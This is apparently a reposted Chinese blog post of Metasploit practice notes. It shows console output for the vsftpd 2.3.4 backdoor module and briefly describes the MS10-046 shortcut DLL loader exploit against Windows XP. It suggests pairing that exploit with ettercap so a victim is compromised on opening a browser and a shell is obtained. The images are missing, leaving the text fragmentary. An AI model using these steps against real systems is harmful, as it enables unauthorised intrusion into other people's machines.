metaspliot一些练习

来源:互联网 发布:linux 程序监控cpu 编辑:程序博客网 时间:2024/05/29 14:58

1.ftp(vsftp2.3.4版本漏洞)



msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date          Rank       Description
   ----                                  ---------------          ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution


msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options


下面是过程






2.win xp ms10_046_shortcut_icon_dllloader漏洞

这是位置

做好设置以后就可以等鱼上钩了,但是最好用ettercap同时配合。这样目标一旦打开ie浏览器就会沦陷。~~
以上的设置是自己的ip
下面看鱼上钩!

好,成功
这是成功的得到payload

直接shell

好,简单吧!
0 0